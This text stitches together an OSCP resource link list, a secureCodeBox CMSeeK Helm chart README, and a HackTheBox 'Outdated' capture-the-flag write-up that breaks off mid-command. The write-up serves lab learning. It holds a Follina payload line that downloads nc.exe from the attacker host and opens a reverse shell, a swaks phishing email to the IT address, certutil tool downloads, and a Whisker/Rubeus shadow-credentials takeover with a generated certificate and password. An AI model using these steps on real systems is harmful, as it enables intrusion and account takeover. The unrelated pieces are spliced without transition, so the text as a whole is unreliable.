[Hackerhive](https://hackerhive.io/) - [Hacktrophy](https://hacktrophy.com/) - [AntiHACK](https://www.antihack.me/) - [CESPPA](https://www.cesppa.com/)
# Resources-For-OSCP ### The Overview:- * https://thehackerish.com/oscp-certification-all-you-need-to-know/ ### The OSCP:- * https://johnjhacking.com/blog/the-oscp-preperation-guide-2020/ * https://github.com/OlivierLaflamme/Cheatsheet-God * https://github.com/foobarto/redteam-notebook/blob/master/README.md * https://github.com/RustyShackleford221/OSCP-Prep * https://paper.dropbox.com/doc/OSCP-Methodology-EnVX7VSiNGZ2K2QxCZD7Q * https://github.com/rewardone/OSCPRepo * https://github.com/0x4D31/awesome-oscp * https://ired.team/offensive-security-experiments/ ### Linux Privilege Escalation:- * https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ * https://book.hacktricks.xyz/linux-unix/privilege-escalation * https://github.com/mzet-/linux-exploit-suggester ### Windows Privilege Escalation:- * https://www.fuzzysecurity.com/tutorials/16.html * http://pwnwiki.io/#!privesc/windows/index.md * https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html ### Buffer Overflow:- * http://strongcourage.github.io/2020/04/19/bof.html * https://github.com/gh0x0st/Buffer_Overflow * https://oscp.infosecsanyam.in/buffer-overflow * https://blog.own.sh/introduction-to-network-protocol-fuzzing-buffer-overflow-exploitation/ * https://veteransec.com/2018/09/10/32-bit-windows-buffer-overflows-made-easy/ * https://vulp3cula.gitbook.io/hackers-grimoire/exploitation/buffer-overflow ### Cheatsheets:- * https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html * https://github.com/slyth11907/Cheatsheets * ### Pentest Cheat Sheets:- * https://github.com/Kitsun3Sec/Pentest-Cheat-Sheets ### All about OSCP:- * https://oscp.infosecsanyam.in/ ## Machines Like OSCP * [Hackthebox OSCP Like Machines](https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159)
--- title: "CMSeeK" category: "scanner" type: "CMS" state: "released" appVersion: "v.1.1.3" usecase: "Automation of the process of detecting the Joomla CMS and its core vulnerabilities" --- <!-- SPDX-FileCopyrightText: the secureCodeBox authors SPDX-License-Identifier: Apache-2.0 --> <!-- .: IMPORTANT! :. -------------------------- This file is generated automatically with `helm-docs` based on the following template files: - ./.helm-docs/templates.gotmpl (general template data for all charts) - ./chart-folder/.helm-docs.gotmpl (chart specific template data) Please be aware of that and apply your changes only within those template files instead of this file. Otherwise your changes will be reverted/overwritten automatically due to the build process `./.github/workflows/helm-docs.yaml` -------------------------- --> <p align="center"> <a href="https://opensource.org/licenses/Apache-2.0"><img alt="License Apache-2.0" src="https://img.shields.io/badge/License-Apache%202.0-blue.svg"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/releases/latest"><img alt="GitHub release (latest SemVer)" src="https://img.shields.io/github/v/release/secureCodeBox/secureCodeBox?sort=semver"/></a> <a href="https://owasp.org/www-project-securecodebox/"><img alt="OWASP Lab Project" src="https://img.shields.io/badge/OWASP-Lab%20Project-yellow"/></a> <a href="https://artifacthub.io/packages/search?repo=securecodebox"><img alt="Artifact HUB" src="https://img.shields.io/endpoint?url=https://artifacthub.io/badge/repository/securecodebox"/></a> <a href="https://github.com/secureCodeBox/secureCodeBox/"><img alt="GitHub Repo stars" src="https://img.shields.io/github/stars/secureCodeBox/secureCodeBox?logo=GitHub"/></a> <a href="https://twitter.com/securecodebox"><img alt="Twitter Follower" src="https://img.shields.io/twitter/follow/securecodebox?style=flat&color=blue&logo=twitter"/></a> </p> ## What is CMSeeK? CMSeeK is an open source penetration testing tool to automate the process of detecting various types of CMS and its installed extensions. Only the Joomla CMS is supported by secureCodeBox. CMSeeK has a database with known vulnerabilities. To learn more about the CMSeeK scanner itself, visit the CMSeeK GitHub repository [here](https://github.com/Tuhinshubhra/CMSeeK). ## Deployment The cmseek chart can be deployed via helm: ```bash # Install HelmChart (use -n to configure another namespace) helm upgrade --install cmseek secureCodeBox/cmseek ``` ## Scanner Configuration The CMSeeK targets are specified with the `-u` parameter. The target should be a URL. Additional CMSeeK scan features can be configured via the parameter attribute. Some useful example parameters listed below: - `-u URL, --url URL` : Target Url. - `--follow-redirect` : Follows all/any redirect(s). - `--no-redirect` : skips all redirects and tests the input target(s) - `-r, --random-agent`: Use a random user agent. - `--googlebot`: Use Google bot user agent. - `--user-agent USER_AGENT`: Specify a custom user agent ## Requirements Kubernetes: `>=v1.11.0-0` ## Values | Key | Type | Default | Description | |-----|------|---------|-------------| | cascadingRules.enabled | bool | `true` | Enables or disables the installation of the default cascading rules for this scanner | | imagePullSecrets | list | `[]` | Define imagePullSecrets when a private registry is used (see: https://kubernetes.io/docs/tasks/configure-pod-container/pull-image-private-registry/) | | parser.affinity | object | `{}` | Optional affinity settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | parser.env | list | `[]` | Optional environment variables mapped into each parseJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | parser.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | parser.image.repository | string | `"docker.io/securecodebox/parser-cmseek"` | Parser image repository | | parser.image.tag | string | defaults to the charts version | Parser image tag | | parser.scopeLimiterAliases | object | `{}` | Optional finding aliases to be used in the scopeLimiter. | | parser.tolerations | list | `[]` | Optional tolerations settings that control how the parser job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | parser.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the parser will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | | scanner.activeDeadlineSeconds | string | `nil` | There are situations where you want to fail a scan Job after some amount of time. To do so, set activeDeadlineSeconds to define an active deadline (in seconds) when considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#job-termination-and-cleanup) | | scanner.affinity | object | `{}` | Optional affinity settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes-using-node-affinity/) | | scanner.backoffLimit | int | 3 | There are situations where you want to fail a scan Job after some amount of retries due to a logical error in configuration etc. To do so, set backoffLimit to specify the number of retries before considering a scan Job as failed. (see: https://kubernetes.io/docs/concepts/workloads/controllers/job/#pod-backoff-failure-policy) | | scanner.env | list | `[]` | Optional environment variables mapped into each scanJob (see: https://kubernetes.io/docs/tasks/inject-data-application/define-environment-variable-container/) | | scanner.extraContainers | list | `[]` | Optional additional Containers started with each scanJob (see: https://kubernetes.io/docs/concepts/workloads/pods/init-containers/) | | scanner.extraVolumeMounts | list | `[]` | Optional VolumeMounts mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.extraVolumes | list | `[]` | Optional Volumes mapped into each scanJob (see: https://kubernetes.io/docs/concepts/storage/volumes/) | | scanner.image.pullPolicy | string | `"IfNotPresent"` | Image pull policy. One of Always, Never, IfNotPresent. Defaults to Always if :latest tag is specified, or IfNotPresent otherwise. More info: https://kubernetes.io/docs/concepts/containers/images#updating-images | | scanner.image.repository | string | `"docker.io/securecodebox/scanner-cmseek"` | Container Image to run the scan | | scanner.image.tag | string | `nil` | defaults to the charts appVersion | | scanner.nameAppend | string | `nil` | append a string to the default scantype name. | | scanner.resources | object | `{}` | CPU/memory resource requests/limits (see: https://kubernetes.io/docs/tasks/configure-pod-container/assign-memory-resource/, https://kubernetes.io/docs/tasks/configure-pod-container/assign-cpu-resource/) | | scanner.securityContext | object | `{"allowPrivilegeEscalation":false,"capabilities":{"drop":["all"]},"privileged":false,"readOnlyRootFilesystem":false,"runAsNonRoot":true}` | Optional securityContext set on scanner container (see: https://kubernetes.io/docs/tasks/configure-pod-container/security-context/) | | scanner.securityContext.allowPrivilegeEscalation | bool | `false` | Ensure that users privileges cannot be escalated | | scanner.securityContext.capabilities.drop[0] | string | `"all"` | This drops all linux privileges from the container. | | scanner.securityContext.privileged | bool | `false` | Ensures that the scanner container is not run in privileged mode | | scanner.securityContext.readOnlyRootFilesystem | bool | `false` | Prevents write access to the containers file system | | scanner.securityContext.runAsNonRoot | bool | `true` | Enforces that the scanner image is run as a non root user | | scanner.tolerations | list | `[]` | Optional tolerations settings that control how the scanner job is scheduled (see: https://kubernetes.io/docs/concepts/scheduling-eviction/taint-and-toleration/) | | scanner.ttlSecondsAfterFinished | string | `nil` | seconds after which the kubernetes job for the scanner will be deleted. Requires the Kubernetes TTLAfterFinished controller: https://kubernetes.io/docs/concepts/workloads/controllers/ttlafterfinished/ | ## License [![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0) Code of secureCodeBox is licensed under the [Apache License 2.0][scb-license]. [scb-owasp]: https://www.owasp.org/index.php/OWASP_secureCodeBox [scb-docs]: https://docs.securecodebox.io/ [scb-site]: https://www.securecodebox.io/ [scb-github]: https://github.com/secureCodeBox/ [scb-twitter]: https://twitter.com/secureCodeBox [scb-slack]: https://join.slack.com/t/securecodebox/shared_invite/enQtNDU3MTUyOTM0NTMwLTBjOWRjNjVkNGEyMjQ0ZGMyNDdlYTQxYWQ4MzNiNGY3MDMxNThkZjJmMzY2NDRhMTk3ZWM3OWFkYmY1YzUxNTU [scb-license]: https://github.com/secureCodeBox/secureCodeBox/blob/master/LICENSE
# Outdated - HackTheBox - Writeup Linux, 30 Base Points, Medium ![info.JPG](images/info.JPG) ## Machine ![‏‏Outdated.JPG](images/Outdated.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp```. ***User 1***: Found PDF on SMB share, From the PDF we know that we need to use ```CVE-2022-30190 (folina)```, Sending mail with URL to folina to ```[email protected]``` and we get a reverse shell as ```btables```. ***User 2***: By running ```bloodhound``` we can see that we can use ```AddKeyCredentialLink``` This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute ```msDS-KeyCredentialLink``` and append it with alternate credentials in the form of certificates, Using that we get the user ```sflowers````. ***Root***: Found ```wsus.outdated.htb``` with misconfiguration (Allow HTTP), Using ```SharpWSUS``` we create an update with ```PSExec.exe``` command that adds ```sflowers``` to local administrators group. ![pwn.JPG](images/pwn.jpg) ## Outdated Solution ### User 1 Let's start with ```nmap``` scanning: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ nmap -sV -sC -oA nmap/Outdated 10.10.11.175 Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-04 00:44 IST Nmap scan report for 10.10.11.175 Host is up (0.099s latency). Not shown: 988 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 25/tcp open smtp hMailServer smtpd | smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP |_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-04 05:44:47Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-11-04T05:46:09+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED | Not valid before: 2022-06-18T05:50:24 |_Not valid after: 2024-06-18T06:00:24 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED | Not valid before: 2022-06-18T05:50:24 |_Not valid after: 2024-06-18T06:00:24 |_ssl-date: 2022-11-04T05:46:08+00:00; +7h00m00s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-11-04T05:46:09+00:00; +6h59m59s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED | Not valid before: 2022-06-18T05:50:24 |_Not valid after: 2024-06-18T06:00:24 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name) |_ssl-date: 2022-11-04T05:46:08+00:00; +7h00m00s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED | Not valid before: 2022-06-18T05:50:24 |_Not valid after: 2024-06-18T06:00:24 Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required | smb2-time: | date: 2022-11-04T05:45:30 |_ start_date: N/A ``` Let's enumerate the SMB share using ```smbclient```: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ smbclient -L outdated.htb Enter WORKGROUP\user's password: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Shares Disk SYSVOL Disk Logon server share UpdateServicesPackages Disk A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system. WsusContent Disk A network share to be used by Local Publishing to place published content on this WSUS system. WSUSTemp Disk A network share used by Local Publishing from a Remote WSUS Console Instance. SMB1 disabled -- no workgroup available ``` We have access only to ```Shares```: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ smbclient \\\\outdated.htb\\Shares Enter WORKGROUP\user's password: Try "help" to get a list of possible commands. smb: \> dir . D 0 Mon Jun 20 18:01:33 2022 .. D 0 Mon Jun 20 18:01:33 2022 NOC_Reminder.pdf AR 106977 Mon Jun 20 18:00:32 2022 9116415 blocks of size 4096. 1733499 blocks available smb: \> ``` The PDF files contain the following content: ![pdf.JPG](images/pdf.JPG) We can see the IT email ```[email protected]``` and we get also a list of relevant vulnerabilities. We can try ```CVE-2022-30190 (Follina)``` - We can send an email to the IT team with the link to our DOC file. From the ```nmap``` scan we can see SMTP port and the mail domain ```mail.outdated.htb```. Let's use the following https://github.com/JohnHammond/msdt-follina](https://github.com/JohnHammond/msdt-follina) link to create a "Follina" MS-MSDT attack with a malicious Microsoft Word document and stage a payload with an HTTP server. We need to edit line 111 on the file ```folina.py``` to: ```python command = f"""Invoke-WebRequest http://10.10.14.14/nc.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc64.exe -e cmd.exe {serve_host} {args.reverse}""" ``` Run it: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ sudo python3 follina.py --interface tun0 --port 80 --reverse 4242 [+] copied staging doc /tmp/erku1ucf [+] created maldoc ./follina.doc [+] serving html payload on :80 [+] starting 'nc -lvnp 4242' listening on [any] 4242 ... ``` We need to copy ```nc64.exe``` to ```/tmp/erku1ucf/www/``` directory. The next step is to send the link to the IT team email ```[email protected]```, We can do it using ```swaks``` as follows: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ swaks --to [email protected] --from [email protected] --server mail.outdated.htb --body "Is that your operation? http://10.10.14.14/" === Trying mail.outdated.htb:25... === Connected to mail.outdated.htb. <- 220 mail.outdated.htb ESMTP -> EHLO parrot <- 250-mail.outdated.htb <- 250-SIZE 20480000 <- 250-AUTH LOGIN <- 250 HELP -> MAIL FROM:<[email protected]> <- 250 OK -> RCPT TO:<[email protected]> <- 250 OK -> DATA <- 354 OK, send. -> Date: Sat, 05 Nov 2022 15:38:47 +0200 -> To: [email protected] -> From: [email protected] -> Subject: test Sat, 05 Nov 2022 15:38:47 +0200 -> Message-Id: <20221105153847.158526@parrot> -> X-Mailer: swaks v20190914.0 jetmore.org/john/code/swaks/ -> -> Is that your operation? http://10.10.14.14/ -> -> -> . <- 250 Queued (10.656 seconds) -> QUIT <- 221 goodbye === Connection closed with remote host. ``` And we get a reverse shell: ```console ┌─[evyatar9@parrot]─[/hackthebox/Outdated] └──╼ $ sudo python3 follina.py --interface tun0 --port 80 --reverse 4242 [+] copied staging doc /tmp/erku1ucf [+] created maldoc ./follina.doc [+] serving html payload on :80 [+] starting 'nc -lvnp 4242' listening on [any] 4242 ... connect to [10.10.14.14] from (UNKNOWN) [10.10.11.175] 49857 Microsoft Windows [Version 10.0.19043.928] (c) Microsoft Corporation. All rights reserved. C:\Users\btables\AppData\Local\Temp\SDIAG_1b264efd-c0a3-42ad-9c0c-68f55d82ff9b>whoami outdated\btables ``` ### User 2 Let's upload [SharpHound.exe](https://github.com/BloodHoundAD/SharpHound) to the machine and run it: ```console C:\Users\btables\Downloads> certutil.exe -urlcache -f http://10.10.14.14:8000/SharpHound.exe SharpHound.exe C:\Users\btables\Downloads>SharpHound.exe -c All --zipfilename output.zip SharpHound.exe -c All --zipfilename output.zip 2022-11-05T21:34:36.5424664-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound 2022-11-05T21:34:41.1251084-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-11-05T21:34:42.0271646-07:00|INFORMATION|Initializing SharpHound at 9:34 PM on 11/5/2022 2022-11-05T21:34:52.0185214-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote 2022-11-05T21:34:54.7465030-07:00|INFORMATION|Beginning LDAP search for outdated.htb 2022-11-05T21:34:55.2985531-07:00|INFORMATION|Producer has finished, closing LDAP channel 2022-11-05T21:34:55.3100086-07:00|INFORMATION|LDAP channel closed, waiting for consumers 2022-11-05T21:35:34.4840181-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2022-11-05T21:36:09.7805280-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM 2022-11-05T21:36:45.7503491-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM 2022-11-05T21:37:17.2379490-07:00|INFORMATION|Status: 4 objects finished (+4 0.02816901)/s -- Using 41 MB RAM 2022-11-05T21:37:22.6144261-07:00|INFORMATION|Consumers finished, closing output channel 2022-11-05T21:37:23.7209309-07:00|INFORMATION|Output channel closed, waiting for output task to complete Closing writers 2022-11-05T21:37:26.7404719-07:00|INFORMATION|Status: 97 objects finished (+93 0.6381579)/s -- Using 44 MB RAM 2022-11-05T21:37:26.7676577-07:00|INFORMATION|Enumeration finished in 00:02:32.0070266 2022-11-05T21:37:29.5435233-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings. 58 name to SID mappings. 1 machine sid mappings. 2 sid to domain mappings. 0 global catalog mappings. 2022-11-05T21:37:30.1130369-07:00|INFORMATION|SharpHound Enumeration Completed at 9:37 PM on 11/5/2022! Happy Graphing! C:\Users\btables\Downloads>dir dir Volume in drive C has no label. Volume Serial Number is 9EA0-5B4E Directory of C:\Users\btables\Downloads 11/05/2022 09:37 PM <DIR> . 11/05/2022 09:37 PM <DIR> .. 11/05/2022 09:37 PM 11,964 20221105213715_output.zip 11/05/2022 09:37 PM 8,677 MjdhMDc5MjItNDk4MS00NjFiLWFkY2ItZjQ0ZTBlODI3Mzhh.bin 11/05/2022 09:34 PM 1,051,648 SharpHound.exe 3 File(s) 1,072,289 bytes 2 Dir(s) 9,404,518,400 bytes free ``` We can use the same ```nc64.exe``` to download the output or we can Base64 encode the file using ```certutil```: ``` C:\Users\btables\Downloads>certutil -encode 20221105213715_output.zip b64.txt certutil -encode 20221105213715_output.zip b64.txt Input Length = 11964 Output Length = 16508 CertUtil: -encode command completed successfully. C:\Users\btables\Downloads> ``` By observing the output using ```bloodhound``` we can see the following: ![bloodhound.JPG](images/bloodhound.jpg) To get ```sflowers``` user we need to use [AddKeyCredentialLink](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials), This technique allows an attacker to take over an AD user or computer account if the attacker can modify the target object's (user or computer account) attribute msDS-KeyCredentialLink and append it with alternate credentials in the form of certificates. According to the link above, first, we need to upload the binaries ```Whisker.exe``` and ```Rubeus.exe```. We can get the binaries from [https://github.com/r3motecontrol/Ghostpack-CompiledBinaries](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries) and from [https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries](https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries) - we need to decompress ```Whisker``` using ```Invoke-Whisker.ps1```. Let's upload the binaries to the target machine: ```console C:\Users\btables\Downloads>certutil.exe -urlcache -f http://10.10.14.14:8000/Whisker.exe Whisker.exe certutil.exe -urlcache -f http://10.10.14.14:8000/Whisker.exe Whisker.exe **** Online **** CertUtil: -URLCache command completed successfully. C:\Users\btables\Downloads>C:\Users\btables\Downloads>certutil.exe -urlcache -f http://10.10.14.14:8000/Rubeus.exe Rubeus.exe certutil.exe -urlcache -f http://10.10.14.14:8000/Rubeus.exe Rubeus.exe **** Online **** CertUtil: -URLCache command completed successfully. ``` Next, we need to run ```Whisker.exe``` to add a new property as a new credential for ```sflowers``` user as follows: ```console C:\Users\btables\Downloads>Whisker.exe add /target:sflowers Whisker.exe add /target:sflowers [*] No path was provided. The certificate will be printed as a Base64 blob [*] No pass was provided. The certificate will be stored with the password hXrbj8cXSRlDXanQ [*] Searching for the target account [*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb [*] Generating certificate [*] Certificate generaged [*] Generating KeyCredential [*] KeyCredential generated with DeviceID aec8c25a-91bb-4027-9d40-91ed41cab8b0 [*] Updating the msDS-KeyCredentialLink attribute of the target object [+] Updated the msDS-KeyCredentialLink attribute of the target object [*] You can now run Rubeus with the following syntax: Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"hXrbj8cXSRlDXanQ" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show ``` We can see it creates the ```Rubeus``` command, Let's run it: ```console C:\Users\btables\Downloads>Rubeus.exe asktgt /user:sflowers 